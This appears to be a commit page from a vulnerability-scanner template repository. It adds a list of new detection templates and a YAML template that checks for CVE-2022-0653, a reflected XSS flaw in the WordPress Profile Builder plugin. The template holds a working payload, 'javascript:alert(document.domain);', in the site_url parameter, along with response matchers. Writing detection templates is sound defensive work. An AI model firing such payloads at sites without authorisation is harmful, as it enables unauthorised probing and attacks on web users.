CVE-2022-0653 Wordpress Profile Builder – User Profile & User Registration Forms (#3761)
* Auto Generated New Template Addition List [Wed Feb 23 16:10:39 UTC 2022] 🤖 * Create CVE-2022-0653.yaml * Auto Generated New Template Addition List [Wed Feb 23 16:13:51 UTC 2022] 🤖 * misc updates * Auto Generated New Template Addition List [Thu Feb 24 11:29:05 UTC 2022] 🤖 Co-authored-by: GitHub Action <action@github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io>patch-1
parent
05563640bd
commit
1f9c5311ab
145
.new-additions
145
.new-additions
|
@ -1,24 +1,169 @@
|
||||||
|
cves/2009/CVE-2009-5020.yaml
|
||||||
|
cves/2012/CVE-2012-4547.yaml
|
||||||
|
cves/2013/CVE-2013-7091.yaml
|
||||||
|
cves/2016/CVE-2016-10940.yaml
|
||||||
|
cves/2016/CVE-2016-3978.yaml
|
||||||
|
cves/2018/CVE-2018-1000226.yaml
|
||||||
|
cves/2018/CVE-2018-18925.yaml
|
||||||
|
cves/2018/CVE-2018-7602.yaml
|
||||||
cves/2019/CVE-2019-1010290.yaml
|
cves/2019/CVE-2019-1010290.yaml
|
||||||
|
cves/2019/CVE-2019-10758.yaml
|
||||||
|
cves/2019/CVE-2019-13396.yaml
|
||||||
|
cves/2019/CVE-2019-3911.yaml
|
||||||
|
cves/2019/CVE-2019-3912.yaml
|
||||||
|
cves/2020/CVE-2020-12447.yaml
|
||||||
|
cves/2020/CVE-2020-18268.yaml
|
||||||
|
cves/2020/CVE-2020-24391.yaml
|
||||||
|
cves/2020/CVE-2020-25864.yaml
|
||||||
|
cves/2020/CVE-2020-35749.yaml
|
||||||
|
cves/2020/CVE-2020-36365.yaml
|
||||||
|
cves/2021/CVE-2021-20150.yaml
|
||||||
|
cves/2021/CVE-2021-20158.yaml
|
||||||
|
cves/2021/CVE-2021-20792.yaml
|
||||||
|
cves/2021/CVE-2021-21973.yaml
|
||||||
|
cves/2021/CVE-2021-24300.yaml
|
||||||
|
cves/2021/CVE-2021-24488.yaml
|
||||||
|
cves/2021/CVE-2021-24510.yaml
|
||||||
|
cves/2021/CVE-2021-24750.yaml
|
||||||
|
cves/2021/CVE-2021-24838.yaml
|
||||||
|
cves/2021/CVE-2021-24926.yaml
|
||||||
|
cves/2021/CVE-2021-24947.yaml
|
||||||
|
cves/2021/CVE-2021-24991.yaml
|
||||||
|
cves/2021/CVE-2021-25008.yaml
|
||||||
|
cves/2021/CVE-2021-25028.yaml
|
||||||
|
cves/2021/CVE-2021-25052.yaml
|
||||||
cves/2021/CVE-2021-25063.yaml
|
cves/2021/CVE-2021-25063.yaml
|
||||||
|
cves/2021/CVE-2021-25074.yaml
|
||||||
|
cves/2021/CVE-2021-25864.yaml
|
||||||
|
cves/2021/CVE-2021-26247.yaml
|
||||||
|
cves/2021/CVE-2021-32682.yaml
|
||||||
|
cves/2021/CVE-2021-32853.yaml
|
||||||
cves/2021/CVE-2021-3293.yaml
|
cves/2021/CVE-2021-3293.yaml
|
||||||
|
cves/2021/CVE-2021-34640.yaml
|
||||||
|
cves/2021/CVE-2021-34643.yaml
|
||||||
|
cves/2021/CVE-2021-39322.yaml
|
||||||
|
cves/2021/CVE-2021-39350.yaml
|
||||||
|
cves/2021/CVE-2021-39433.yaml
|
||||||
|
cves/2021/CVE-2021-40323.yaml
|
||||||
cves/2021/CVE-2021-43062.yaml
|
cves/2021/CVE-2021-43062.yaml
|
||||||
|
cves/2021/CVE-2021-43810.yaml
|
||||||
|
cves/2021/CVE-2021-45380.yaml
|
||||||
|
cves/2021/CVE-2021-46005.yaml
|
||||||
cves/2022/CVE-2022-0149.yaml
|
cves/2022/CVE-2022-0149.yaml
|
||||||
|
cves/2022/CVE-2022-0218.yaml
|
||||||
|
cves/2022/CVE-2022-0281.yaml
|
||||||
|
cves/2022/CVE-2022-0378.yaml
|
||||||
|
cves/2022/CVE-2022-0432.yaml
|
||||||
|
cves/2022/CVE-2022-0653.yaml
|
||||||
|
cves/2022/CVE-2022-23178.yaml
|
||||||
|
cves/2022/CVE-2022-23808.yaml
|
||||||
|
cves/2022/CVE-2022-23944.yaml
|
||||||
cves/2022/CVE-2022-24112.yaml
|
cves/2022/CVE-2022-24112.yaml
|
||||||
cves/2022/CVE-2022-25323.yaml
|
cves/2022/CVE-2022-25323.yaml
|
||||||
|
default-logins/cobbler/cobbler-default-login.yaml
|
||||||
|
default-logins/gophish/gophish-default-login.yaml
|
||||||
|
default-logins/huawei/huawei-HG532e-default-router-login.yaml
|
||||||
|
default-logins/jboss/jmx-default-login.yaml
|
||||||
|
default-logins/mofi/mofi4500-default-login.yaml
|
||||||
|
default-logins/netsus/netsus-default-login.yaml
|
||||||
|
default-logins/versa/versa-default-login.yaml
|
||||||
|
default-logins/xerox/xerox7-default-login.yaml
|
||||||
|
exposed-panels/alfresco-detect.yaml
|
||||||
|
exposed-panels/atvise-login.yaml
|
||||||
|
exposed-panels/bigbluebutton-login.yaml
|
||||||
|
exposed-panels/cisco/cisco-ucs-kvm-login.yaml
|
||||||
|
exposed-panels/cobbler-webgui.yaml
|
||||||
|
exposed-panels/code42-panel.yaml
|
||||||
|
exposed-panels/concrete5/concrete5-install.yaml
|
||||||
|
exposed-panels/concrete5/concrete5-panel.yaml
|
||||||
|
exposed-panels/ecosys-command-center.yaml
|
||||||
|
exposed-panels/flightpath-panel.yaml
|
||||||
|
exposed-panels/gophish-login.yaml
|
||||||
|
exposed-panels/hashicorp-consul-agent.yaml
|
||||||
|
exposed-panels/hashicorp-consul-webgui.yaml
|
||||||
|
exposed-panels/jamf-panel.yaml
|
||||||
|
exposed-panels/netdata-dashboard-detected.yaml
|
||||||
|
exposed-panels/netsus-server-login.yaml
|
||||||
|
exposed-panels/openbmcs-detect.yaml
|
||||||
exposed-panels/otobo-panel.yaml
|
exposed-panels/otobo-panel.yaml
|
||||||
|
exposed-panels/projectsend-login.yaml
|
||||||
exposed-panels/pypicloud-panel.yaml
|
exposed-panels/pypicloud-panel.yaml
|
||||||
|
exposed-panels/qualcomm-voip-router.yaml
|
||||||
|
exposed-panels/seeddms-panel.yaml
|
||||||
|
exposed-panels/strapi-documentation.yaml
|
||||||
|
exposed-panels/submitty-login.yaml
|
||||||
|
exposed-panels/teltonika-login.yaml
|
||||||
|
exposed-panels/terraform-enterprise-panel.yaml
|
||||||
|
exposed-panels/threatq-login.yaml
|
||||||
|
exposed-panels/trendnet/trendnet-tew827dru-login.yaml
|
||||||
|
exposed-panels/typo3-login.yaml
|
||||||
exposed-panels/unauth-xproxy-dashboard.yaml
|
exposed-panels/unauth-xproxy-dashboard.yaml
|
||||||
|
exposed-panels/versa-sdwan.yaml
|
||||||
|
exposed-panels/voipmonitor-panel.yaml
|
||||||
|
exposed-panels/wallix-accessmanager-panel.yaml
|
||||||
|
exposed-panels/wazuh-panel.yaml
|
||||||
|
exposed-panels/webmodule-ee-panel.yaml
|
||||||
|
exposed-panels/xxljob-panel.yaml
|
||||||
|
exposed-panels/zblogphp-panel.yaml
|
||||||
|
misconfiguration/caddy-open-redirect.yaml
|
||||||
|
misconfiguration/cobbler-exposed-directory.yaml
|
||||||
|
misconfiguration/misconfigured-concrete5.yaml
|
||||||
|
misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
|
||||||
|
misconfiguration/openbmcs/openbmcs-ssrf.yaml
|
||||||
|
ssl/deprecated-tls.yaml
|
||||||
|
takeovers/gitbook-takeover.yaml
|
||||||
takeovers/short-io.yaml
|
takeovers/short-io.yaml
|
||||||
|
technologies/airtame-device-detect.yaml
|
||||||
|
technologies/apollo-server-detect.yaml
|
||||||
|
technologies/appcms-detect.yaml
|
||||||
|
technologies/cobbler-version.yaml
|
||||||
|
technologies/erxes-detect.yaml
|
||||||
|
technologies/gnuboard-detect.yaml
|
||||||
|
technologies/interactsh-server.yaml
|
||||||
|
technologies/lexmark-detect.yaml
|
||||||
|
technologies/metatag-cms.yaml
|
||||||
|
technologies/projectsend-detect.yaml
|
||||||
technologies/roundcube-webmail-portal.yaml
|
technologies/roundcube-webmail-portal.yaml
|
||||||
|
technologies/smartstore-detect.yaml
|
||||||
|
technologies/typo3-detect.yaml
|
||||||
technologies/web-suite-detect.yaml
|
technologies/web-suite-detect.yaml
|
||||||
technologies/zerof-webserver-detect.yaml
|
technologies/zerof-webserver-detect.yaml
|
||||||
|
vulnerabilities/gitlab/gitlab-rce.yaml
|
||||||
|
vulnerabilities/jamf/jamf-blind-xxe.yaml
|
||||||
|
vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
|
||||||
|
vulnerabilities/joomla/rusty-joomla.yaml
|
||||||
|
vulnerabilities/laravel/laravel-ignition-xss.yaml
|
||||||
|
vulnerabilities/other/antsword-backdoor.yaml
|
||||||
vulnerabilities/other/goip-1-lfi.yaml
|
vulnerabilities/other/goip-1-lfi.yaml
|
||||||
|
vulnerabilities/other/java-melody-xss.yaml
|
||||||
|
vulnerabilities/other/kyocera-m2035dn-lfi.yaml
|
||||||
vulnerabilities/other/otobo-open-redirect.yaml
|
vulnerabilities/other/otobo-open-redirect.yaml
|
||||||
vulnerabilities/other/pollbot-redirect.yaml
|
vulnerabilities/other/pollbot-redirect.yaml
|
||||||
|
vulnerabilities/other/yishaadmin-lfi.yaml
|
||||||
|
vulnerabilities/ransomware/deadbolt-ransomware.yaml
|
||||||
vulnerabilities/wordpress/accessibility-helper-xss.yaml
|
vulnerabilities/wordpress/accessibility-helper-xss.yaml
|
||||||
|
vulnerabilities/wordpress/candidate-application-lfi.yaml
|
||||||
|
vulnerabilities/wordpress/cherry-lfi.yaml
|
||||||
|
vulnerabilities/wordpress/churchope-lfi.yaml
|
||||||
|
vulnerabilities/wordpress/db-backup-lfi.yaml
|
||||||
vulnerabilities/wordpress/easy-social-feed.yaml
|
vulnerabilities/wordpress/easy-social-feed.yaml
|
||||||
|
vulnerabilities/wordpress/elementorpage-open-redirect.yaml
|
||||||
vulnerabilities/wordpress/elex-woocommerce-xss.yaml
|
vulnerabilities/wordpress/elex-woocommerce-xss.yaml
|
||||||
vulnerabilities/wordpress/feedwordpress-xss.yaml
|
vulnerabilities/wordpress/feedwordpress-xss.yaml
|
||||||
|
vulnerabilities/wordpress/hb-audio-lfi.yaml
|
||||||
|
vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml
|
||||||
vulnerabilities/wordpress/mthemeunus-lfi.yaml
|
vulnerabilities/wordpress/mthemeunus-lfi.yaml
|
||||||
|
vulnerabilities/wordpress/music-store-open-redirect.yaml
|
||||||
vulnerabilities/wordpress/my-chatbot-xss.yaml
|
vulnerabilities/wordpress/my-chatbot-xss.yaml
|
||||||
|
vulnerabilities/wordpress/newsletter-open-redirect.yaml
|
||||||
|
vulnerabilities/wordpress/ninjaform-open-redirect.yaml
|
||||||
|
vulnerabilities/wordpress/noptin-open-redirect.yaml
|
||||||
|
vulnerabilities/wordpress/shortcode-lfi.yaml
|
||||||
|
vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
|
||||||
|
vulnerabilities/wordpress/sniplets-lfi.yaml
|
||||||
|
vulnerabilities/wordpress/sniplets-xss.yaml
|
||||||
|
vulnerabilities/wordpress/wp-code-snippets-xss.yaml
|
||||||
|
vulnerabilities/wordpress/wp-spot-premium-lfi.yaml
|
||||||
vulnerabilities/wordpress/wp-whmcs-xss.yaml
|
vulnerabilities/wordpress/wp-whmcs-xss.yaml
|
||||||
|
workflows/concrete-workflow.yaml
|
||||||
|
workflows/gophish-workflow.yaml
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2022-0653
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Profile Builder Plugin XSS
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
reference:
|
||||||
|
- https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
|
||||||
|
tags: cve,cve2022,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<a href="javascript:alert(document.domain);">here</a>'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue